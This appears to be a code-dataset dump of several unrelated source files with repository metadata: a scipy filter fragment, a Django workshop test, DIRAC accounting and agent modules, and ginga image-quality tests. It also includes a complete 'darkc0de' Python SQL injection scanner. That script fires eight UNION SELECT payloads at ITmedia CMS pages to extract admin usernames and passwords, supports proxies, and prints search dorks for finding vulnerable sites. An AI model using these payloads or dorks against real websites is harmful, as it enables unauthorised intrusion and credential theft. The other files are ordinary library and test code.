                     extra_arguments=(), extra_keywords=None):
"""Calculate a one-dimensional filter along the given axis.
`generic_filter1d` iterates over the lines of the array, calling the
    given function at each line. The arguments of the function are the
    input line and the output line. The input and output lines are 1D
double arrays. The input line is extended appropriately according
to the filter size and origin. The output line must be modified
in-place with the result.
Parameters
----------
%(input)s
function : callable
Function to apply along given axis.
filter_size : scalar
Length of the filter.
%(axis)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
%(extra_arguments)s
%(extra_keywords)s
"""
if extra_keywords is None:
extra_keywords = {}
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
if filter_size < 1:
raise RuntimeError('invalid filter size')
axis = _ni_support._check_axis(axis, input.ndim)
if ((filter_size // 2 + origin < 0) or
(filter_size // 2 + origin >= filter_size)):
raise ValueError('invalid origin')
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.generic_filter1d(input, function, filter_size, axis, output,
mode, cval, origin, extra_arguments, extra_keywords)
return return_value
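# --- Editor's note: hedged sketch (not in the original module) of the
# callback contract documented above: the callable receives the extended
# input line and must fill the output line in place. The running-mean
# kernel below is an illustrative assumption.
def _example_generic_filter1d():
    import numpy as np
    def running_mean(in_line, out_line):
        # in_line carries filter_size - 1 extra boundary elements
        for i in range(out_line.size):
            out_line[i] = in_line[i:i + 3].mean()
    data = np.arange(12, dtype=float).reshape(3, 4)
    return generic_filter1d(data, running_mean, filter_size=3)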
@docfiller
def generic_filter(input, function, size=None, footprint=None,
output=None, mode="reflect", cval=0.0, origin=0,
                   extra_arguments=(), extra_keywords=None):
"""Calculates a multi-dimensional filter using the given function.
At each element the provided function is called. The input values
within the filter footprint at that element are passed to the function
as a 1D array of double values.
Parameters
----------
%(input)s
function : callable
Function to apply at each element.
%(size_foot)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
%(extra_arguments)s
%(extra_keywords)s
"""
if extra_keywords is None:
extra_keywords = {}
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
origins = _ni_support._normalize_sequence(origin, input.ndim)
if footprint is None:
if size is None:
raise RuntimeError("no footprint or filter size provided")
sizes = _ni_support._normalize_sequence(size, input.ndim)
footprint = numpy.ones(sizes, dtype=bool)
else:
footprint = numpy.asarray(footprint)
footprint = footprint.astype(bool)
fshape = [ii for ii in footprint.shape if ii > 0]
if len(fshape) != input.ndim:
raise RuntimeError('filter footprint array has incorrect shape.')
for origin, lenf in zip(origins, fshape):
if (lenf // 2 + origin < 0) or (lenf // 2 + origin >= lenf):
raise ValueError('invalid origin')
if not footprint.flags.contiguous:
footprint = footprint.copy()
output, return_value = _ni_support._get_output(output, input)
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.generic_filter(input, function, footprint, output, mode,
cval, origins, extra_arguments, extra_keywords)
return return_value
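# --- Editor's note: hedged sketch (not in the original module). Each
# footprint neighbourhood reaches the callable as a flat double array, so
# any reduction works; the local range below is an illustrative choice.
def _example_generic_filter():
    import numpy as np
    img = np.arange(25, dtype=float).reshape(5, 5)
    return generic_filter(img, lambda v: v.max() - v.min(), size=3)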
|
beiko-lab/gengis
|
bin/Lib/site-packages/scipy/ndimage/filters.py
|
Python
|
gpl-3.0
| 39,925
|
[
"Gaussian"
] |
4c2f7292da7788db07bc5d8f893c48e98dc468d800e4a2b1a4db71e2ba1e096f
|
from datetime import datetime, timedelta
import re
from wye.base.constants import WorkshopStatus
from .. import factories as f
def test_workshop_flow(base_url, browser, outbox):
user = f.create_user()
user.set_password('123123')
user.save()
url = base_url + '/workshop/'
browser.visit(url)
browser.fill('login', user.email)
browser.fill('password', '123123')
browser.find_by_css('[type=submit]')[0].click()
assert len(outbox) == 1
mail = outbox[0]
confirm_link = re.findall(r'http.*/accounts/.*/', mail.body)
assert confirm_link
browser.visit(confirm_link[0])
assert browser.title, "Confirm E-mail Address"
browser.find_by_css('[type=submit]')[0].click()
poc_type = f.create_usertype(slug='poc', display_name='poc')
user.profile.usertype.add(poc_type)
user.save()
org = f.create_organisation()
org.user.add(user)
user.profile.interested_locations.add(org.location)
org.save()
workshop = f.create_workshop(requester=org)
workshop.expected_date = datetime.now() + timedelta(days=20)
# workshop.presenter.add(user)
workshop.status = WorkshopStatus.REQUESTED
workshop.location = org.location
workshop.save()
url = base_url + '/workshop/update/{}/'.format(workshop.id)
browser.visit(url)
browser.fill('login', user.email)
browser.fill('password', '123123')
browser.find_by_css('[type=submit]')[0].click()
tutor_type = f.create_usertype(slug='tutor', display_name='tutor')
user.profile.usertype.remove(poc_type)
user.profile.usertype.add(tutor_type)
user.save()
url = base_url + '/workshop/'
browser.visit(url)
accept_workshop_link = browser.find_by_text('Accept')[0]
assert accept_workshop_link
accept_workshop_link.click()
reject_workshop_link = browser.find_by_text('Reject')[0]
assert reject_workshop_link
reject_workshop_link.click()
user.profile.usertype.remove(tutor_type)
user.profile.usertype.add(poc_type)
user.save()
# hold_workshop_link = browser.find_by_text('Hold')[0]
# assert hold_workshop_link
# hold_workshop_link.click()
# publish_workshop_link = browser.find_by_text('Publish/Request')[0]
# assert publish_workshop_link
# publish_workshop_link.click()
workshop.expected_date = datetime.now() + timedelta(days=-20)
workshop.save()
url = base_url + '/workshop/'
browser.visit(url)
f.create_workshop_rating()
publish_workshop_link = browser.find_by_text('Share Feedback')[0]
assert publish_workshop_link
publish_workshop_link.click()
url = base_url + '/workshop/feedback/{}'.format(workshop.id)
browser.visit(url)
browser.check('rating0-1')
browser.fill('comment', "Testing comments")
browser.find_by_css('[type=submit]')[0].click()
|
DESHRAJ/wye
|
tests/functional/test_workshops_flow.py
|
Python
|
mit
| 2,827
|
[
"VisIt"
] |
70b448b59896b71eefd8bf4650746ca8393b5a2e8fd575b13d1094cacfbcca83
|
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
import sys, os, time, re, urllib2, httplib, socket
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
proxy = "None"
count = 0
if len(sys.argv) < 2 or len(sys.argv) > 4:
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Help: itmedia.py -h |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
for arg in sys.argv:
if arg == '-h':
print "\n|-------------------------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Usage: itmedia.py www.site.com |"
print "| Example: itmedia.py http://www.blagoleks.net |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|-------------------------------------------------------------------------------|\n"
sys.exit(1)
elif arg == '-p':
proxy = sys.argv[count+1]
count += 1
site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site[-1] != "/":
site = site+"/"
vulnsql = ["vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass,0x62616c74617a6172),3,4,5,6,7+from+admin--","vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172)+from+admin--","vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5,6,7,8,9,10+from+admin--","galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass,0x62616c74617a6172)+from+admin--","galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5+from+admin--","ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass,0x62616c74617a6172),3+from+admin--","ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4+from+admin--","slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5+from+admin--"]
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
socket.setdefaulttimeout(20)
try:
if proxy != "None":
print "[+] Proxy:",proxy
print "\n[+] Testing Proxy..."
pr = httplib.HTTPConnection(proxy)
pr.connect()
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
proxyfier = urllib2.build_opener(proxy_handler)
proxyfier.open("http://www.google.com")
print
print "\t[!] w00t!,w00t! Proxy: "+proxy+" Working"
print
else:
print "[-] Proxy not given"
print
proxy_handler = ""
except(socket.timeout):
print
print "\t[-] Proxy Timed Out"
print
sys.exit(1)
except(),msg:
print msg
print "\t[-] Proxy Failed"
print
sys.exit(1)
try:
url = "http://antionline.com/tools-and-toys/ip-locate/index.php?address="
except(IndexError):
print "[-] Wtf?"
proxyfier = urllib2.build_opener(proxy_handler)
proxy_check = proxyfier.open(url).readlines()
for line in proxy_check:
if re.search("<br><br>", line):
line = line.replace("</b>","").replace('<br>',"").replace('<b>',"")
print "\n[!]",line,"\n"
print "[+] Target:",site
print "[+]",len(vulnsql),"Vulns loaded..."
print "[+] Starting Scan..\n"
for sql in vulnsql:
print "[+] Checking:",site+sql.replace("\n","")
print
try:
source = proxyfier.open(site+sql.replace("\n", "")).read()
search = re.findall("baltazar",source)
if len(search) > 0:
print "[!] w00t!w00t" ,site+sql.replace("\n", "")
print
except(KeyboardInterrupt, SystemExit):
raise
except:
pass
print
print
print
print """\tDork : inurl:/galerija.php?op=slika
inurl:/ponuda.php?op=slika
inurl:/vijest.php?id= intext:itmedia
inurl:/slike.php?op=slika
"""
print
print "Check for more details: http://packetstormsecurity.org/0808-exploits/itmedia-sql.txt"
print "\n[-] %s" % time.strftime("%X")
|
knightmare2600/d4rkc0de
|
exploits/090117.py
|
Python
|
gpl-2.0
| 6,260
|
[
"VisIt"
] |
d982e49874f6ff8dd43e152eb2bca389923d45cf6c7e861479007cb60d9808d6
|
""" Contains a class used for evaluating policies for accessing jobs/WMS/pilots accounting
"""
__RCSID__ = "$Id$"
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Security import Properties
from DIRAC.AccountingSystem.private.Policies.FilterExecutor import FilterExecutor
class JobPolicy( object ):
def __init__( self ):
self.__executor = FilterExecutor()
self.__executor.addGlobalFilter( self.__checkConditions )
def getListingConditions( self, credDict ):
condDict = {}
userProps = credDict[ 'properties' ]
if Properties.JOB_ADMINISTRATOR in userProps:
return condDict
elif Properties.JOB_MONITOR in userProps:
return condDict
    elif Properties.JOB_SHARING in userProps:
      condDict[ 'UserGroup' ] = [ credDict[ 'group' ] ]
    elif Properties.NORMAL_USER in userProps:
      # a plain user is pinned to his own records, mirroring the
      # behaviour of __checkConditions below
      condDict[ 'User' ] = [ credDict[ 'username' ] ]
    return condDict
def checkRequest( self, iD, credDict, condDict, groupingList ):
return self.__executor.applyFilters( iD, credDict, condDict, groupingList )
def __checkConditions( self, credDict, condDict, groupingField ):
userProps = credDict[ 'properties' ]
if Properties.JOB_ADMINISTRATOR in userProps:
return S_OK()
elif Properties.JOB_MONITOR in userProps:
return S_OK()
elif Properties.JOB_SHARING in userProps:
if 'User' in condDict:
condDict[ 'UserGroup' ] = credDict[ 'group' ]
if 'User' == groupingField:
condDict[ 'UserGroup' ] = credDict[ 'group' ]
if 'UserGroup' in condDict:
condDict[ 'UserGroup' ] = credDict[ 'group' ]
if 'UserGroup' == groupingField:
condDict[ 'UserGroup' ] = credDict[ 'group' ]
elif Properties.NORMAL_USER in userProps:
if 'User' in condDict:
condDict[ 'User' ] = credDict[ 'username' ]
if 'User' == groupingField:
condDict[ 'User' ] = credDict[ 'username' ]
if 'UserGroup' in condDict:
condDict[ 'User' ] = credDict[ 'username' ]
condDict[ 'UserGroup' ] = credDict[ 'group' ]
if 'UserGroup' == groupingField:
condDict[ 'User' ] = credDict[ 'username' ]
condDict[ 'UserGroup' ] = credDict[ 'group' ]
else:
condDict['User'] = credDict['username']
else:
if 'User' in condDict:
del( condDict[ 'User' ] )
if 'UserGroup' in condDict:
del( condDict[ 'UserGroup' ] )
if 'User' == groupingField:
return S_ERROR( "You can't group plots by users! Bad boy!" )
if 'UserGroup' == groupingField:
return S_ERROR( "You can't group plots by user groups! Bad boy!" )
return S_OK()
def filterListingValues( self, credDict, dataDict ):
userProps = credDict[ 'properties' ]
if Properties.JOB_ADMINISTRATOR in userProps:
return S_OK( dataDict )
elif Properties.JOB_MONITOR in userProps:
return S_OK( dataDict )
elif Properties.JOB_SHARING in userProps:
return S_OK( dataDict )
elif Properties.NORMAL_USER in userProps:
return S_OK( dataDict )
dataDict[ 'User' ] = []
dataDict[ 'UserGroup' ] = []
return S_OK( dataDict )
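# --- Editor's note: hedged usage sketch, not part of the original DIRAC
# module. It illustrates how the policy narrows listing conditions for a
# plain user; the credential dictionary is a minimal assumption covering
# only the fields the class reads.
if __name__ == "__main__":
  policy = JobPolicy()
  credDict = { 'username' : 'jdoe', 'group' : 'dirac_user',
               'properties' : [ Properties.NORMAL_USER ] }
  # expected: { 'User' : [ 'jdoe' ] } -- a normal user only sees his own jobs
  print policy.getListingConditions( credDict )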
|
fstagni/DIRAC
|
AccountingSystem/private/Policies/JobPolicy.py
|
Python
|
gpl-3.0
| 3,030
|
[
"DIRAC"
] |
51a6191c77dbd67caeffc82d1923ec73f78124017a0e1f41d4d0d08adc8429e4
|
########################################################################
# $HeadURL$
# File : AgentReactor.py
# Author : Adria Casajus
########################################################################
"""
DIRAC class to execute Agents
  Agents are the active part of any DIRAC system: they execute in a cyclic
  manner, looking at the state of the system and reacting to it by taking
  appropriate actions
All DIRAC Agents must inherit from the basic class AgentModule
In the most common case, DIRAC Agents are executed using the dirac-agent command.
  dirac-agent accepts a list of positional arguments. These arguments have the form:
[DIRAC System Name]/[DIRAC Agent Name]
dirac-agent then:
    - produces an instance of AgentReactor
- loads the required modules using the AgentReactor.loadAgentModules method
- starts the execution loop using the AgentReactor.go method
  Agent modules must be placed under the Agent directory of a DIRAC System
  (DIRAC Systems are called XXXSystem, where XXX is the [DIRAC System Name])
  and must inherit from the base class AgentModule
"""
__RCSID__ = "$Id$"
import time
import os
from DIRAC import S_OK, S_ERROR, gLogger, rootPath
from DIRAC.ConfigurationSystem.Client import PathFinder
from DIRAC.Core.Base.private.ModuleLoader import ModuleLoader
from DIRAC.Core.Utilities import ThreadScheduler
from DIRAC.ConfigurationSystem.Client.Helpers import getInstalledExtensions
from DIRAC.Core.Base.AgentModule import AgentModule
class AgentReactor:
"""
Main interface to DIRAC Agents. It allows to :
- define a Agents modules to be executed
- define the number of cycles to execute
- steer the execution
Agents are declared via:
- loadAgentModule(): for a single Agent
- loadAgentModules(): for a list of Agents
The number of cycles to execute for a defined Agent can be set via:
- setAgentModuleCyclesToExecute()
The execution of the Agents is done with:
- runNumCycles(): to execute an additional number of cycles
    - go(): to run the execution loop until all Agents have exhausted their
      cycles or are signalled to stop
During the execution of the cycles, each of the Agents can be signaled to stop
by creating a file named "stop_agent" in its Control Directory.
"""
def __init__( self, baseAgentName ):
self.__agentModules = {}
self.__loader = ModuleLoader( "Agent", PathFinder.getAgentSection, AgentModule )
self.__tasks = {}
self.__baseAgentName = baseAgentName
self.__scheduler = ThreadScheduler.ThreadScheduler( enableReactorThread = False,
minPeriod = 30 )
self.__alive = True
self.__running = False
def loadAgentModules( self, modulesList, hideExceptions = False ):
"""
Load all modules required in moduleList
"""
result = self.__loader.loadModules( modulesList, hideExceptions = hideExceptions )
if not result[ 'OK' ]:
return result
self.__agentModules = self.__loader.getModules()
for agentName in self.__agentModules:
agentData = self.__agentModules[ agentName ]
agentData[ 'running' ] = False
try:
instanceObj = agentData[ 'classObj' ]( agentName, agentData[ 'loadName' ], self.__baseAgentName )
result = instanceObj.am_initialize()
if not result[ 'OK' ]:
return S_ERROR( "Error while calling initialize method of %s: %s" % ( agentName, result[ 'Message' ] ) )
agentData[ 'instanceObj' ] = instanceObj
except Exception, excp:
if not hideExceptions:
gLogger.exception( "Can't load agent %s" % agentName )
return S_ERROR( "Can't load agent %s: \n %s" % ( agentName, excp ) )
agentPeriod = instanceObj.am_getPollingTime()
result = self.__scheduler.addPeriodicTask( agentPeriod, instanceObj.am_go,
executions = instanceObj.am_getMaxCycles(),
elapsedTime = agentPeriod )
if not result[ 'OK' ]:
return result
taskId = result[ 'Value' ]
      self.__tasks[ taskId ] = agentName
agentData[ 'taskId' ] = taskId
agentData[ 'running' ] = True
if not self.__agentModules:
return S_ERROR( "No agent module loaded" )
return S_OK()
def runNumCycles( self, agentName = None, numCycles = 1 ):
"""
Run all defined agents a given number of cycles
"""
if agentName:
self.loadAgentModules( [ agentName ] )
error = ''
for aName in self.__agentModules:
result = self.setAgentModuleCyclesToExecute( aName, numCycles )
if not result['OK']:
error = 'Failed to set cycles to execute'
gLogger.error( '%s:' % error, aName )
break
if error:
return S_ERROR( error )
self.go()
return S_OK()
def __finalize( self ):
"""
Execute the finalize method of all Agents
"""
for agentName in self.__agentModules:
try:
self.__agentModules[agentName]['instanceObj'].finalize()
except Exception:
gLogger.exception( 'Failed to execute finalize for Agent:', agentName )
def go( self ):
"""
Main method to control the execution of all configured Agents
"""
if self.__running:
return
self.__running = True
try:
while self.__alive:
self.__checkControlDir()
timeToNext = self.__scheduler.executeNextTask()
        if timeToNext is None:
gLogger.info( "No more agent modules to execute. Exiting" )
break
time.sleep( min( max( timeToNext, 0.5 ), 5 ) )
finally:
self.__running = False
self.__finalize()
def setAgentModuleCyclesToExecute( self, agentName, maxCycles = 1 ):
"""
Set number of cycles to execute for a given agent (previously defined)
"""
    if agentName not in self.__agentModules:
return S_ERROR( "%s has not been loaded" % agentName )
if maxCycles:
try:
maxCycles += self.__agentModules[ agentName ][ 'instanceObj' ].am_getCyclesDone()
except Exception:
error = 'Can not determine number of cycles to execute'
gLogger.exception( '%s:' % error, '"%s"' % maxCycles )
return S_ERROR( error )
self.__agentModules[ agentName ][ 'instanceObj' ].am_setOption( 'MaxCycles', maxCycles )
self.__scheduler.setNumExecutionsForTask( self.__agentModules[ agentName ][ 'taskId' ],
maxCycles )
return S_OK()
def __checkControlDir( self ):
"""
Check for the presence of stop_agent file to stop execution of the corresponding Agent
"""
for agentName in self.__agentModules:
if not self.__agentModules[ agentName ][ 'running' ]:
continue
agent = self.__agentModules[ agentName ][ 'instanceObj' ]
alive = agent.am_getModuleParam( 'alive' )
if alive:
if agent.am_checkStopAgentFile():
gLogger.info( "Found StopAgent file for agent %s" % agentName )
alive = False
if not alive:
gLogger.info( "Stopping agent module %s" % ( agentName ) )
self.__scheduler.removeTask( self.__agentModules[ agentName ][ 'taskId' ] )
del( self.__tasks[ self.__agentModules[ agentName ][ 'taskId' ] ] )
self.__agentModules[ agentName ][ 'running' ] = False
agent.am_removeStopAgentFile()
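# --- Editor's note: hedged usage sketch, not part of the original DIRAC
# module. It mirrors what the dirac-agent command does; the agent name
# "FrameworkSystem/CAUpdateAgent" is purely illustrative.
if __name__ == "__main__":
  reactor = AgentReactor( "FrameworkSystem/CAUpdateAgent" )
  result = reactor.runNumCycles( "FrameworkSystem/CAUpdateAgent", numCycles = 1 )
  if not result[ 'OK' ]:
    gLogger.error( result[ 'Message' ] )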
|
Sbalbp/DIRAC
|
Core/Base/AgentReactor.py
|
Python
|
gpl-3.0
| 7,331
|
[
"DIRAC"
] |
3e875e46d2a5316e287aa15be9a61e599750ccc6c73f61dbfebcd52bfb38c0c4
|
import logging
import numpy as np
import pytest
from numpy.testing import assert_allclose, assert_array_equal
from ginga.AstroImage import AstroImage
from ginga.util import iqcalc, iqcalc_astropy
from ginga.util.iqcalc import have_scipy # noqa
from ginga.util.iqcalc_astropy import have_photutils # noqa
@pytest.mark.parametrize(
('arr', 'ans'),
[(np.arange(5), 2),
(np.array([1, np.inf, 3, np.nan, 5]), 3),
(np.arange(10).reshape(2, 5), 4.5)])
def test_get_mean_median(arr, ans):
assert iqcalc.get_mean(arr) == ans
assert iqcalc.get_median(arr) == ans
def test_get_mean_median_nan():
arr = np.array([np.nan, np.inf])
assert np.isnan(iqcalc.get_mean(arr))
assert np.isnan(iqcalc.get_median(arr))
def test_get_mean_mask():
"""Test that a partially masked array works with get_mean()"""
arr = np.array([-5, 4, 0, 3, -2, 7, 10, -10, 5, 6])
m_arr = np.ma.masked_where(arr < 0, arr)
assert_allclose(iqcalc.get_mean(m_arr), 5.0)
def test_get_median_mask():
"""Test that a partially masked array works with get_median()"""
arr = np.array([-5, 4, 0, 3, 1, -2, 7, 10, -10, 5, 6, -1])
m_arr = np.ma.masked_where(arr < 0, arr)
assert_allclose(iqcalc.get_median(m_arr), 4.5)
class TestIQCalcNoInherit:
"""IQCalc tests that do not need corresponding tests for Astropy.
If the method is re-implemented in iqcalc_astropy, move the test method
to `TestIQCalc`.
"""
def setup_class(self):
logger = logging.getLogger("TestIQCalc")
self.iqcalc = iqcalc.IQCalc(logger=logger)
self.data = np.arange(100).reshape((10, 10))
def test_starsize(self):
fwhm = self.iqcalc.starsize(1.0, -1.6e-5, 3.5, 1.5e-5)
assert_allclose(fwhm, 0.12329999999999999)
def test_cut_region(self):
x0, y0, arr = self.iqcalc.cut_region(5, 7, 5, self.data)
assert (x0, y0) == (0, 2)
assert_array_equal(arr, self.data[2:, :])
def test_cut_cross(self):
x0, y0, xarr, yarr = self.iqcalc.cut_cross(1, 4, 3, self.data)
assert x0 == 0
assert y0 == 1
assert_array_equal(xarr, [40, 41, 42, 43, 44])
assert_array_equal(yarr, [11, 21, 31, 41, 51, 61, 71])
def test_brightness(self):
assert_allclose(self.iqcalc.brightness(5, 4, 3, 0, self.data), 66)
@pytest.mark.skipif('not have_scipy')
def test_ee_odd(self):
data = np.ma.array(
[[0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 10, 1, 1, 0],
[0, 1, 2, 3, 2, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 100, 0, 0, 0]],
mask=[[False, False, False, False, False, False, False],
[False, False, False, False, False, False, False],
[False, False, False, True, False, False, False],
[False, False, False, False, False, False, False],
[False, False, False, False, False, False, False],
[False, False, False, False, False, False, False],
[False, False, False, True, False, False, False]])
for fn in (self.iqcalc.ensquared_energy, self.iqcalc.encircled_energy):
interp_fn = fn(data)
assert_allclose(interp_fn.x, [0, 1, 2, 3])
assert_allclose(interp_fn.y, [0.10714286, 0.42857143, 1, 1])
@pytest.mark.skipif('not have_scipy')
def test_ee_even(self):
data = np.ma.array(
[[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 2, 2, 2, 2, 1, 0],
[0, 1, 2, 3, 10, 2, 1, 0],
[0, 1, 2, 3, 3, 2, 1, 0],
[0, 1, 2, 2, 2, 2, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 100, 0, 0, 0, 0]],
mask=[[False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False],
[False, False, False, False, True, False, False, False],
[False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False],
[False, False, False, True, False, False, False, False]])
fn_sq = self.iqcalc.ensquared_energy(data)
assert_allclose(fn_sq.x, [0, 1, 2, 3])
assert_allclose(fn_sq.y, [0.16981132, 0.62264151, 1, 1])
fn_circ = self.iqcalc.encircled_energy(data)
assert_allclose(fn_circ.x, [0, 1, 2, 3])
assert_allclose(fn_circ.y, [0.16981132, 0.47169811, 0.9245283, 1])
@pytest.mark.skipif('not have_scipy')
class TestIQCalcPhot:
# Shared attributes that subclass can access.
logger = logging.getLogger("TestIQCalc")
# This is taken from subset of array mentioned in
# https://photutils.readthedocs.io/en/stable/detection.html#detecting-stars
data = np.array(
[[3961, 4143, 3780, 3871, 3871, 3871, 3508, 3780, 3780, 3780, 3780],
[3961, 3961, 3598, 3961, 3961, 3780, 3780, 3780, 3780, 3780, 3780],
[3961, 3961, 3598, 3961, 3961, 4143, 4143, 3780, 3780, 3780, 3780],
[3780, 3961, 3961, 4143, 4506, 5776, 5413, 3961, 3961, 3961, 3961],
[3780, 3961, 3961, 4143, 5232, 9043, 7954, 4687, 3961, 3598, 3598],
[3939, 4302, 4302, 4211, 5300, 7659, 6933, 4710, 3984, 3621, 3621],
[3939, 3939, 3939, 3848, 4211, 4392, 4392, 3984, 3984, 3621, 3621],
[3757, 3757, 3757, 4029, 3666, 4029, 3666, 3803, 3803, 3621, 3621],
[3757, 3757, 3757, 3666, 4029, 4029, 3666, 3803, 3803, 3621, 3621],
[4120, 3939, 3576, 3757, 3757, 3576, 3576, 3712, 3712, 3530, 3530],
[4120, 3939, 3576, 3757, 3757, 3576, 3576, 3712, 3712, 3530, 3530]])
# This is taken from photutils find_peaks test.
PEAKDATA = np.array([[1, 0, 0], [0, 0, 0], [0, 0, 1]]).astype(float)
PEAKREF1 = [(0, 0), (2, 2)]
def setup_class(self):
self.iqcalc = iqcalc.IQCalc(logger=self.logger)
def test_centroid(self):
# We are not testing cut region here, so we use all the data.
xycen = self.iqcalc.centroid(self.data, 5, 5, 5)
assert_allclose(xycen, (4.960327886939483, 4.922639686006575))
def test_find_bright_peaks_default_pars(self):
# Also tests get_threshold indirectly.
peaks = self.iqcalc.find_bright_peaks(self.data)
max_xy = [(5, 4)]
assert_array_equal(peaks, max_xy)
def test_find_bright_peaks_no_mask(self):
peaks = self.iqcalc.find_bright_peaks(
self.PEAKDATA, threshold=0.1, radius=1)
assert_array_equal(peaks, self.PEAKREF1)
def test_find_bright_peaks_masked(self):
mask = np.zeros(self.PEAKDATA.shape, dtype=bool)
mask[0, 0] = True
data = np.ma.array(self.PEAKDATA, mask=mask)
peaks = self.iqcalc.find_bright_peaks(data, threshold=0.1, radius=1)
assert_array_equal(peaks, [self.PEAKREF1[1]])
def test_fwhm_data(self):
fwhm_x, fwhm_y, ctr_x, ctr_y, x_res, y_res = self.iqcalc.fwhm_data(
5, 4, self.data, radius=3, method_name='gaussian')
# Relax tolerance for TestIQCalcPhotAstropy
assert_allclose(fwhm_x, 1.9671665379707803, rtol=2e-7)
assert_allclose(fwhm_y, 2.054971090163851, rtol=2e-7)
assert_allclose(ctr_x, 5.353724230524191, rtol=2e-7)
assert_allclose(ctr_y, 4.248692873436124, rtol=2e-7)
assert_allclose(x_res['sdev'], 0.8353787127478465, rtol=2e-7)
assert_allclose(y_res['sdev'], 0.8726658729188976, rtol=2e-7)
def test_photometry(self):
objlist = self.iqcalc.evaluate_peaks(
[(5, 4)], self.data, fwhm_radius=1.5, ee_total_radius=3)
assert len(objlist) == 1
result_1 = objlist[0]
result_2 = self.iqcalc.pick_field(
self.data, fwhm_radius=1.5, ee_total_radius=3)
astroim = AstroImage(data_np=self.data, logger=self.iqcalc.logger)
result_3 = self.iqcalc.qualsize(
astroim, fwhm_radius=1.5, ee_total_radius=3)
# Relax tolerance for TestIQCalcPhotAstropy
for res in (result_1, result_2, result_3):
assert_allclose(res.objx, 5.353330481192139)
assert_allclose(res.objy, 4.2480576624213455)
assert_allclose(res.pos, 0.9967616536846655)
assert_allclose(res.oid_x, 5.091012868410129)
assert_allclose(res.oid_y, 4.072592361975923)
assert_allclose(res.fwhm_x, 1.9625726210572922, rtol=5e-7)
assert_allclose(res.fwhm_y, 2.0491919125821827, rtol=5e-7)
assert_allclose(res.fwhm, 2.0063497685493314, rtol=5e-7)
assert res.fwhm_radius == 1.5
assert_allclose(res.brightness, 5234.639533977552)
assert_allclose(res.elipse, 0.9577300247024001, rtol=1e-6)
assert res.x == 5
assert res.y == 4
assert_allclose(res.skylevel, 4033.15)
assert_allclose(res.background, 3803)
assert_allclose(res.encircled_energy_fn(1.5), 0.88921253)
assert_allclose(res.ensquared_energy_fn(1.5), 0.88976561)
result_4 = self.iqcalc.qualsize(astroim, x1=1, y1=1, x2=10, y2=10, fwhm_radius=1.5, minfwhm=1.8)
# A bit different for result_4 due to slightly truncated data.
# Relax tolerance for TestIQCalcPhotAstropy
assert_allclose(result_4.objx, 5.35505379856564)
assert_allclose(result_4.objy, 4.25153281221611)
assert_allclose(result_4.pos, 0.9951892891389722)
assert_allclose(result_4.oid_x, 4.091012868410129)
assert_allclose(result_4.oid_y, 3.072592361975923)
assert_allclose(result_4.fwhm_x, 1.8788622094597287, rtol=5e-7)
assert_allclose(result_4.fwhm_y, 1.9727658817644915, rtol=5e-7)
assert_allclose(result_4.fwhm, 1.926386309439247, rtol=5e-7)
assert result_4.fwhm_radius == 1.5
assert_allclose(result_4.brightness, 5097.983320858308)
assert_allclose(result_4.elipse, 0.9523999917208762, rtol=1e-6)
